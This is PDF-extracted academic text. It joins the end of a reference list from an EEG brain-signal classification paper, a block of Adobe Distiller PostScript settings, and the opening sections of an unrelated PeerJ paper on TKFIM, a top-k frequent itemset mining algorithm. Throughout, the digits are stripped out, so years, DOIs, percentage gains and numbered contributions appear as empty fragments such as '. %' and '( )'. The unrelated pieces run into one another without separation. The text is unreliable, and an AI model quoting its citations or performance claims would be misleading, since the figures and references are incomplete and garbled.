neuroscience : doi . /fnsys. . . luo j, feng z, zhang j, lu n. . dynamic frequency feature selection based approach for classification of motor imageries. computers in biology and medicine : – doi . /j.compbiomed. . . . martisius i, birvinskas d, damasevicius r, jusas v. . eeg dataset reduction and classification using wave atom transform. in: mladenov v, koprinkova-hristova p, palm g, villa aep, appollini b, kasabov n, eds. artificial neural networks and machine learning— icann . berlin: springer, – . mathworks t. . long short-term memory networks. available at https://au.mathworks.com/ help/deeplearning/ug/long-short-term-memory-networks.html (accessed march ). mingai l, shuoda g, jinfu y, yanjun s. . a novel eeg feature extraction method based on oemd and csp algorithm. journal of intelligent & fuzzy systems ( ): – . mullen t, kothe c, chi ym, ojeda a, kerth t, makeig s, cauwenberghs g, jung t. . real-time modeling and d visualization of source dynamics and connectivity using wearable eeg. in: th annual international conference of the ieee engineering in medicine and biology society (embc). piscataway: ieee, – . mumtaz w, ali ssa, yasin mam, malik as. . a machine learning framework involving eeg-based functional connectivity to diagnose major depressive disorder (mdd). medical & biological engineering & computing ( ): – doi . /s - - -z. neurostyle. . nbetter stroke rehabilitation system. available at http://neuro-style.com/ nbetter-stroke-rehabilitation-system/ (accessed march ). novi q, cuntai g, dat th, ping x. . sub-band common spatial pattern (sbcsp) for brain-computer interface. in: rd international ieee/embs conference on neural engineering. piscataway: ieee, – . peng g, nourani m, harvey j, dave h. . feature selection using f-statistic values for eeg signal analysis. in: nd annual international conference of the ieee engineering in medicine & biology society (embc). piscataway: ieee, – . poli r, kennedy j, blackwell t. . particle swarm optimization. swarm intelligence ( ): – doi . /s - - - . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /fnsys. . http://dx.doi.org/ . /j.compbiomed. . . https://au.mathworks.com/help/deeplearning/ug/long-short-term-memory-networks.html https://au.mathworks.com/help/deeplearning/ug/long-short-term-memory-networks.html http://dx.doi.org/ . /s - - -z http://neuro-style.com/nbetter-stroke-rehabilitation-system/ http://neuro-style.com/nbetter-stroke-rehabilitation-system/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ radha m, fonseca p, moreau a, ross m, cerny a, anderer p, long x, aarts rm. . sleep stage classification from heart-rate variability using long short-term memory neural networks. scientific reports ( ): doi . /s - - -y. rajasekar p, pushpalatha m. . huffman quantization approach for optimized eeg signal compression with transformation technique. soft computing ( ): – doi . /s - - -z. ramoser h, muller-gerking j, pfurtscheller g. . optimal spatial filtering of single trial eeg during imagined hand movement. ieee transactions on rehabilitation engineering ( ): – doi . / . . sharma a, vans e, shigemizu d, boroevich ka, tsunoda t. . deepinsight: a methodology to transform a non-image data to an image for convolution neural network architecture. scientific reports ( ): doi . /s - - - . thomas kp, cuntai g, lau ct, vinod ap, keng ka. . a new discriminative common spatial pattern method for motor imagery brain computer interfaces. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . türk Ö, Şeker m, akpolat v, Özerdem ms. . classification of mental task eeg records using hjorth parameters. in: th signal processing and communications applications conference (siu). – . utsumi k, takano k, okahara y, komori t, onodera o, kansaku k. . operation of a p -based brain-computer interface in patients with duchenne muscular dystrophy. scientific reports ( ): doi . /s - - - . wang h, zhang y, waytowich nr, krusienski dj, zhou g, jin j, wang x, cichocki a. . discriminative feature extraction via multivariate linear regression for ssvep-based bci. ieee transactions on neural systems and rehabilitation engineering ( ): – doi . /tnsre. . . wang j, feng z, lu n, sun l, luo j. . an information fusion scheme based common spatial pattern method for classification of motor imagery tasks. biomedical signal processing and control : – doi . /j.bspc. . . . wei q, wei z. . binary particle swarm optimization for frequency band selection in motor imagery based brain-computer interfaces. bio-medical materials and engineering (s ):s –s doi . /bme- . wodecki j, michalak a, zimroz r. . optimal filter design with progressive genetic algorithm for local damage detection in rolling bearings. mechanical systems and signal processing : – doi . /j.ymssp. . . . wu h, niu y, li f, li y, fu b, shi g, dong m. . a parallel multiscale filter bank convolutional neural networks for motor imagery eeg classification. frontiers in neuroscience : doi . /fnins. . . xing x, wang y, pei w, guo x, liu z, wang f, ming g, zhao h, gui q, chen h. . a high-speed ssvep-based bci using dry eeg electrodes. scientific reports ( ): doi . /s - - - . xu b, song a, zhao g, liu j, xu g, pan l, yang r, li h, cui j. . eeg-modulated robotic rehabilitation system for upper extremity. biotechnology & biotechnological equipment ( ): – doi . / . . . xu z, yang x, sun j, liu p, qin w. . sleep stage classification using time-frequency spectra from consecutive multi-time points. frontiers in neuroscience : doi . /fnins. . . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tnsre. . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . /bme- http://dx.doi.org/ . /j.ymssp. . . http://dx.doi.org/ . /fnins. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . /fnins. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ yang b, li h, wang q, zhang y. . subject-based feature extraction by using fisher wpd-csp in brain-computer interfaces. computer methods and programs in biomedicine : – doi . /j.cmpb. . . . yang f, zhao x, jiang w, gao p, liu g. . multi-method fusion of cross-subject emotion recognition based on high-dimensional eeg features. frontiers in computational neuroscience : doi . /fncom. . . yin z, liu l, chen j, zhao b, wang y. . locally robust eeg feature selection for individual-independent emotion recognition. expert systems with applications : doi . /j.eswa. . . yuksel a, olmez t. . a neural network-based optimal spatial filter design method for motor imagery classification. plos one ( ):e doi . /journal.pone. . yulita in, rosadi r, purwani s, suryani m. . multi-layer perceptron for sleep stage classification. journal of physics: conference series : doi . / - / / / . zeng h, dai g, kong w, chen f, wang l. . a novel nonlinear dynamic method for stroke rehabilitation effect evaluation using eeg. ieee transactions on neural systems and rehabilitation engineering ( ): – doi . /tnsre. . . zhang y, wang y, jin j, wang x. . sparse bayesian learning for obtaining sparsity of eeg frequency bands based feature vectors in motor imagery classification. international journal of neural systems ( ): doi . /s . zhang y, wang y, zhou g, jin j, wang b, wang x, cichocki a. . multi-kernel extreme learning machine for eeg classification in brain-computer interfaces. expert systems with applications : – doi . /j.eswa. . . . zhang y, zhou g, jin j, wang x, cichocki a. . optimizing spatial patterns with sparse filter bands for motor-imagery based brain-computer interface. journal of neuroscience methods : – doi . /j.jneumeth. . . . zhou d, li x. . epilepsy eeg signal classification algorithm based on improved rbf. frontiers in neuroscience : doi . /fnins. . . zhou m, tian c, cao r, wang b, niu y, hu t, guo h, xiang j. . epileptic seizure detection based on eeg signals and cnn. frontiers in neuroinformatics : doi . /fninf. . . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cmpb. . . http://dx.doi.org/ . /fncom. . http://dx.doi.org/ . /j.eswa. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /tnsre. . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . /fnins. . http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optical&#x b;: a frequency-based deep learning scheme for recognizing brain wave signals introduction materials and methods results and discussion results discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted december accepted january published march corresponding author lisu yu, lisuyu@ncu.edu.cn academic editor muhammad asif additional information and declarations can be found on page doi . /peerj-cs. copyright iqbal et al. distributed under creative commons cc-by . open access tkfim: top-k frequent itemset mining technique based on equivalence classes saood iqbal , abdul shahid , muhammad roman , zahid khan , shaha al-otaibi and lisu yu , institute of computing, kohat university of science & technology, kohat, kohat, kpk, pakistan robotics and internet of things lab, prince sultan university, riyadh, saudi arabia information systems department, college of computer and information sciences, princess nourah bint abdulrahman university, riyadh, saudi arabia school of information engineering, nanchang university, jiangxi, china state key laboratory of computer architecture, institute of computing technology, chinese academy of sciences, beijing, china abstract frequently used items mining is a significant subject of data mining studies. in the last ten years, due to innovative development, the quantity of data has grown exponentially. for frequent itemset (fis) mining applications, it imposes new chal- lenges. misconceived information may be found in recent algorithms, including both threshold and size based algorithms. threshold value plays a central role in generating frequent itemsets from the given dataset. selecting a support threshold value is very complicated for those unaware of the dataset’s characteristics. the performance of algorithms for finding fis without the support threshold is, however, deficient due to heavy computation. therefore, we have proposed a method to discover fis without the support threshold, called top-k frequent itemsets mining (tkfim). it uses class equivalence and set-theory concepts for mining fis. the proposed procedure does not miss any fis; thus, accurate frequent patterns are mined. furthermore, the results are compared with state-of-the-art techniques such as top-k miner and build once and mine once (bomo). it is found that the proposed tkfim has outperformed the results of these approaches in terms of execution and performance, achieving . , . , . , and . percent gain on top-k miner using chess, mushroom, and connect and t d k datasets, respectively. similarly, it has achieved a performance gain of . , , . , . percent on bomo using chess, mushroom, connect, and t d k datasets, respectively. therefore, it is argued that the proposed procedure may be adopted on a large dataset for better performance. subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning, data science keywords frequent itemsets, support threshold, algorithm analysis, top-k frequent itemsets, artifical intelligence introduction finding fis is one of the leading research problems used in many critical data mining tasks like classification (nguyen et al., ), clustering (wang et al., ), sequential patterns (fournier-viger et al., ), and association rule mining (arm) (agrawal, imielinski & swami, ). besides this, other various applications such as multitask how to cite this article iqbal s, shahid a, roman m, khan z, al-otaibi s, yu l. . tkfim: top-k frequent itemset mining tech- nique based on equivalence classes. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:lisuyu@ncu.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. based association rule mining (taser, birant & birant, ), high utility pattern mining (krishnamoorthy, ), top-k pattern mining (nguyen et al., ), and frequent weighted mining (nam et al., b). fis mining methods find the set of items that frequently occurs in a given set of transactions. it shows the association rules which define how an itemset in a transaction dataset depends on another itemset’s behavior. the first algorithm used for computing and finding association among fis is known as apriori (agrawal, imielinski & swami, ; agrawal & srikant, ). the apriori algorithm generates a large number of candidate itemset. it also performs multiple scanning of the transaction table for finding frequent itemsets that result in overhead on input and output devices. for large database systems, the i/o overhead becomes more demanding for large memory for storing the data. later on, zaki & gouda ( ) proposed the declat, a diffset algorithm. it employs a vertical representation of the database. the fundamental concept of a diffset algorithm is that a particular set of transaction ids (tidsets) can be used to measure the support of itemsets. the main serious demerit of the eclat approach is the size of tidsets, which affect the processing time and are costly to store in memory. another algorithm that influenced most of the work in this area is frequent pattern (fp) growth (han, pei & yin, ). the fp-growth method performs at least two scans. first, process frequent patterns of length- and count their support value. afterward, the items are sorted in decreasing order of their support. these methods are referred to as conventional methods. the conventional fis methods are based on the minimum support threshold (fournier- viger et al., ; agrawal & srikant, ). in a transaction table, the minimum supported value, also known as minsup, specifies the minimum frequency of an element in a collection. all the itemsets whose frequency exceeds or is equal to the threshold value are known as fis. however, it is a difficult task to find a reasonable value for a threshold. for example, if the threshold value is maintained too low, too many fis can be created, and the necessary patterns can hardly be found among the massive collection of produced patterns. similarly, if the threshold value is set too high, it will generate too few fis, in which we may miss some crucial patterns in the transaction table. the selection of the threshold value also affects the field of the search and the resulting space (huynh-thi-le et al., ). thus another set of methods emerges; they are referred to as top-k procedures. it is the procedure to find out itemsets of highest support to the k support among all the existing fis. it refers to the user’s choice of frequent itemsets in the dataset. user choice allows the user to find top-most frequent itemsets. top-most early frequent itemsets procedure finds the top-most frequent itemsets by repeating the mining process until the desired result is obtained. these approaches generally require more execution time and produce ample result-space, resulting in redundant patterns in the transaction table. n-most is a top-most frequent itemset mining technique that processes the top n impressive results without specifying any user-parameter (fu, kwong & tang, ). it makes use of the apriori candidate creation procedure and test strategy. it first computes the largest itemset and then compares the support of candidate itemsets, recursively. in every iteration, it updates the support threshold of itemsets. the process continues until the user specified bound on the itemset size. the top-most mining technique is the top-k frequent itemsets iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. mining. unlike n-most frequent itemsets mining procedure, top-k finds itemsets of highest support without specifying the itemset size. top-k frequent itemsets mining may be divided into support threshold and without support threshold-based mining algorithms. these algorithms may also be categorized into algorithms based on apriori and fp-growth (agrawal, imielinski & swami, ; han, pei & yin, ). the top-k algorithms (based on apriori) build -itemset and then attach to -itemset and so on. in the end, the results are compared with a user-specified threshold value. top-k algorithms based on fp-growth use fp-tree for pattern mining. it splits the transactions to reduce the search-space. the critical advantage of fp based algorithms is that they use a tree structure of a transaction database. the disadvantage of using a tree is its difficulty in being stored in memory, and its building procedure is costly. han et al. ( ) proposed tfp (top-k frequent closed itemsets mining algorithm), which uses fp-tree without the user’s support threshold. the algorithm constructs the fp-tree based on the primary support threshold starting with zero. it prunes smaller transactions using itemsets length constraints. mining is performed on the final pruned fp-tree. the algorithms discussed above need to scan the transaction table multiple times to build the tree. they also consume large search-space and uses expensive strategies to improve performance. details of these methods are discussed in the related work section. research gap however, summarizing the limitation of the previous studies that are ( ) the absence of user-specified support threshold parameter can affect the performance of the fis mining algorithms, ( ) the generation of the exponential number of itemsets and support counting is difficult to handle in top-k fis mining techniques, and finally, ( ) effectively trimming those transactions that are not useful for the next level, which increases the processing time and degrades performance are the main challenging areas to be handled. to overcome these limitations, we proposed top-k frequent itemsets mining (tkfim) algorithm finding fis without a user-specified support threshold. the working of tkfim is based on concept equivalence classes of set theory. each class is an independent group of itemsets. further, it uses diffset to count the support of the itemsets. the proposed procedure applies to a vertical database structure consisting of transaction ids (tids) followed by items. our algorithm adopts a class-based search strategy to quickly find itemsets of highest support, and it mines the candidates of the current class-based on the joining process. if the support of an itemset is less than the least support in the top-k list, then the current class terminates the generation of candidate itemsets. the next class joining process is then applied accordingly. the process is repeated until no frequent or candidate itemsets are found. finally, the results of the proposed system are compared with bomo and top-k miner on multiple datasets. the contributions of this paper are listed as follows: . it presents fis based top-k algorithm that reduces the number of scans and decreases the run time. . it finds all frequent fis and ifis, and do not miss any pattern. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . this research provides a comprehensive review of the existing literature in the field of frequent itemset mining. . based on the critical analysis, this paper highlights the limitations of the state-of-the-art research studies used for fis mining. . the pruning strategy is used in this paper to reduce the number of candidate frequent itemsets. . afterwards, a novel approach (i.e., tkfim) is proposed, designed, implements based on equivalence classes and diffset theory. . the experimental results show that tkfim has a significant advantage over the existing algorithms. finally, tkfim results are compared with bomo and top-k miner techniques. these algorithms are evaluated on five different datasets, i.e., chess, mushroom, connect, and synthetic dataset. further, the performance gains on each dataset are recorded. in the first experiment, on the chess dataset, the average performance gain of . % and . % was achieved compared to bomo and top-k miner, respectively. similarly, on the mushroom dataset, more than % and . % performance gain was achieved concerning bomo and top-k miner. on the third dataset, i.e., connect . % and . % performance gain was delivered compared to bomo and top-k miner, respectively. in the final experiment on the synthetic dataset (t d k), the average performance gain of . % and . %was recorded for bomo and top-k miner. related work in the area of frequent itemset mining, the very first algorithm, i.e., apriori, was proposed by agrawal, imielinski & swami ( ). this algorithm uses a bottom-up search method to process the extraction of frequent itemsets. it handles all itemsets in k-steps where k represents the size of a given database. in the first step, all the frequent -itemsets are generated. in the second step, all the frequent -itemset are joined to compute -itemsets, compare their support with the given specified minsup. all the frequent -itemsets are processed for the subsequent -itemsets. the process continues until no itemsets can be found. another classical algorithm referred to as eclat was proposed by zaki ( ). the transaction database and minsup are used as the input for this algorithm. it counts the support of itemsets using tids, which is the length of the itemset. eclat algorithm is more efficient than those algorithms which repeatedly scans the database, but it requires more memory to store the tidsets. declat algorithm is a variation of the eclat algorithm implemented using a structure called diffsets (zaki & gouda, ) rather than tidsets. fp-growth is proposed by han, jiawei, and pei, jian in for finding frequent itemsets without candidate generation (han, pei & yin, ). it uses fp-tree for computing frequent itemsets by scanning it at least twice. in the first scan, it processes frequent patterns of length- and counts their support value. in the second scan, the items are sorted in decreasing order of their support. it splits the database to build multiple conditional fp-trees, which considerably reduces the search-space. fp-growth works better than apriori because the data in the memory is a tree structure form. all the conventional iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithms involve an enormous search-space, and it may expand exponentially. the database also needs to be searched regularly, which requires a lot of runtimes. however, since the threshold parameters for these algorithms are required, selecting the threshold value remains a difficult task. if the threshold value remains very high, too many items will be produced. on the other hand, it can lead to too few frequent items when support is too high. top-most fis itemset mining algorithms are proposed to solve this issue of traditional fis mining methods, top-most fis methods top-most fis refers to the user choice of fis in the dataset. user choice allows the user to find top-most fis. top-most early fis procedure finds top-most frequent itemsets by repeating the mining process until the desired result is obtained. the researcher found two significant problems in early top-most fis procedures. first, it takes much more execution time to find the result. secondly, it produces large search-space and result-space. recently, a novel scheme of top-most fis mining called n-most interesting frequent itemsets has been projected (fu, kwong & tang, ). it processes the top-n impressive results without specifying any user parameter. it makes use of the apriori candidate creation procedure and test strategy. it first computes the largest itemset in the dataset. the n-largest itemsets mining compares the support of the candidate itemsets recursively and updates the support threshold at the end of the iteration. the process is iterated and stops at the user-specified bound on the itemset size. the top-most fis mining is divided into two different sets of mining processes, including n-most and top-k itemsets. the details are discussed in the following sections. n-most interesting fis procedures it combines the n-most interesting frequent k-itemsets for every k where <= k <=m and k is the user-supplied maximum size of the itemsets to be mined. this mining process comes from the itemset-iloop and itemset-loop algorithms (fu, kwong & tang, ). the itemset-loop is the first technique proposed in n-most interesting frequent itemsets mining category. its method of candidate creation is similar to the apriori candidate process. itemset-loop algorithm first computes the set of potential -itemset, and then the new potential -itemsets are rooted from -itemsets. in the next iteration, new potential -itemsets are produced from a -itemset. the process is iterated and ends at the user- specified hop on the itemset sized. hence it requires loops back in the kth iteration to generate n-most exciting itemsets. the idea of the itemset-iloop method is similar to that of itemset-loop, except it goes back first to check k - itemsets. the underlying principle for both methods is that if a k-itemset is not frequent, all its subsets are rare. for mining n-most intriguing itemsets, this apriori standard does not apply. cheung & fu ( ) have introduced a technique based on the principle of build once and mine once (bomo) to address the drawbacks of the most interesting items in mining. this procedure is based on the free parameter for n-most exciting items. the bomo is a technique based on fp-growth that uses the inherent characteristics of the iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. compact pattern-tree structure. it works without candidate generation to improve results in frequent itemsets mining problems. being an fp-growth-based approach, bomo suffers from common demerits, such as scanning the database multiple times to evaluate itemsets’ support. fp-tree structure is time-consuming, and visiting nodes to evaluate the support of itemsets is very in-efficient. consequently, the size of the database is immense. thus it may not be possible to store it in the main memory. as a result, the result set will cause the failure of the mining operation. top-k fis mining methods the top-k fis mining methods can be categorized as support threshold and non-threshold- based algorithms. most frequent pattern mining algorithms depend on the right minimum support threshold parameter. however, as already discussed, it is very tricky in practice to determine the right value for this parameter. therefore another category of top-k frequent itemsets algorithms is proposed, which are threshold-free. the top-k fis mining techniques are also classified as apriori and fp-based algorithms. the apriori based techniques generate fis of -itemsets, and then produced -itemset by joining them, and similarly -itemsets, and so on. on the other hand, fp-growth based top-k fis techniques make use of fp-tree for frequent mining patterns. it divides the transactions to reduce the scope of the search. the main advantage of fp-growth based algorithms is that the tree data structure is an unstructured form of the transaction database. these types of algorithms cannot be stored in memory and, therefore, costly to build. however, vertical format based techniques are more intuitive and straightforward as compared to horizontal format developing approaches. top-k frequent closed itemsets, the algorithm called tfp without the minimum threshold using the fp tree, have been suggested by han et al. ( ). the algorithm begins with the fp-tree, the primary threshold being set at zero. the smaller transaction, i.e., a transaction with length <minimum length, is pruned during the tree’s construction. after fp-tree construction, it uses a closed node count and a descendant sum method to prune the relatively unusual patterns by increasing the support threshold. in order to accelerate the process, the tfp algorithm uses fp-tree accessing strategies such as bottom-up and top-down. mining is performed on the final pruned fp-tree. on the other hand, the tfp algorithm has many demerits. for the fp-tree, the database must be scanned twice. the tfp is an fp-growth-inspired method and uses two parameters. this algorithm consumes a large search-space and uses expensive strategies to improve performance. amphawan, lenca & surarerks ( ) have focused on finding top-k periodic-frequent patterns. it initially considers the highest support patterns and then combines candidates to form the top-k periodic-frequent patterns list. pietracaprina & vandin ( ) suggested that top-k miner find top-k frequently closed unlimited items. the algorithm starts primarily with approximate minimum support having heuristics similar to those references in the above top-k closed frequent itemsets mining procedures. this procedure has dynamically raised the support threshold with no need to restart computation. it uses the priority queue to stop comparing the support of closed itemsets. further, it adopts the best-first search to iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. produce the first highest support closed itemsets. at the point when all the closed itemset support is processed, it terminates the main loop. at this point, k is assigned a new value, and the loop repeats to generate the highest support closed itemsets. a naive approach called the combination reducing method (crm) is recently proposed by pyun & yun ( ). this algorithm reduces time and saves memory by applying the composite pattern concept. the crm is fp-growth based algorithm that constructs a conditional fp-tree. the algorithm starts with an initial support threshold of zero while building the fp-tree from the dataset. following this, the algorithm constructs a global fp. during the development of the fp-tree, a header table is generated simultaneously. the sequence of selecting the prefix is different from fp-growth. the prefix is the center item in the header table that is quite suitable for the mining of top-k frequent patterns. it can raise the threshold effectively and process patterns quickly. crm does not consider the pattern length, so the top-k patterns are placed without length constraints into the top-k list. the current top-k composite pattern list and the recovery phase are used to create top-k patterns. on the other hand, the crm algorithm has numerous disadvantages. to build the fp-tree, it still has to scan the database twice. crm is an fp growth inspired approach and uses two parameters. this algorithm requires a large search-space and is expensive using the recovery phase to improve the performance. the top-k list includes many redundant composite patterns when the value of k is put as a large. pyun & yun ( ) also developed a combination reduction method for n-itemsets (crmn) followed itemset length constraints. crmn scans the dataset at least two times, and initial support is set to zero. in the mining procedure, crmn first constructs fp global-tree. it subsequently mines top-k patterns from fp-global-tree. during this process, the composite patterns are grouped into k-patterns for each length in the top-k list if the present conditional fp tree has one-path. if the tree has a multipath, the algorithm will detect frequent patterns and insert them into the top-k list according to its lengths. salam & khayal ( ) proposed top-most and top-k methods based on the association graph structure. a symmetric matrix stores the entry of the graph as a data structure. the algorithm scans the database once and starts with the fp tree with the initial support threshold of zero during the construction of the all-path source to destination (asd)- tree (salam & khayal, ). this method mines search-space and construct an asd tree simultaneously. it suffers from serious demerit that it computes all -itemsets and scans each transaction to build an association ratio graph. it computes edge values simultaneously to detect a maximum cycle. the other drawback in this approach is that it identifies those itemsets as top-k itemsets, but originally itemset has low dataset occurrence. recently, saif-ur-rehman et al. ( ) suggested a top-k miner approach to find fis. they scan the database once and find a supporting threshold higher than zero for all the frequent -itemsets. they use candidate itemsets search tree (cis-tree) (saif-ur-rehman et al., ) to mine the desired number of top-k fis of highest support. the technique suffers from various limitations, such as it computes -itemsets before constructing the cis-tree, which is expensive to build as it consumes much memory. this algorithm has reduced the search-space but has increased the runtime of the mining iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. process. furthermore, the frequent itemsets joining procedure for the construction of cis-tree is a time-consuming process. as discussed above, several frequent itemset mining practices were proposed, but they all face a challenge to reduce the time needed to calculate and reduce the space needed to perform the algorithm to mine all the frequent patterns required. the summary of top-k fis mining algorithms’ strengths and weaknesses are shown in table . it suggests that top-k frequent mining algorithms are needed to be further improved to produce efficient output. proposed methodology the objective of this paper is to present algorithms that can find top-k frequent itemsets without using the minsup parameter. the proposed algorithm begins by requesting that the user provide a ‘‘k’’ value, i.e., how many fis does he required? the system proposed initially generates a frequent itemset of size one by scanning the database for the first and last time. then the system uses equivalence classes to create the next frequent itemset level. the process repeats; initialize the item k at the next level to the lowest support until no frequent items or items can be found. the proposed work has two significant advantages: it does not require a support threshold, and secondly, the database is scanned once to generate fis. the detailed working of the proposed technique is discussed in this section. before going into exact steps, a few definitions are essential to understand. def- : frequent itemsets: in a 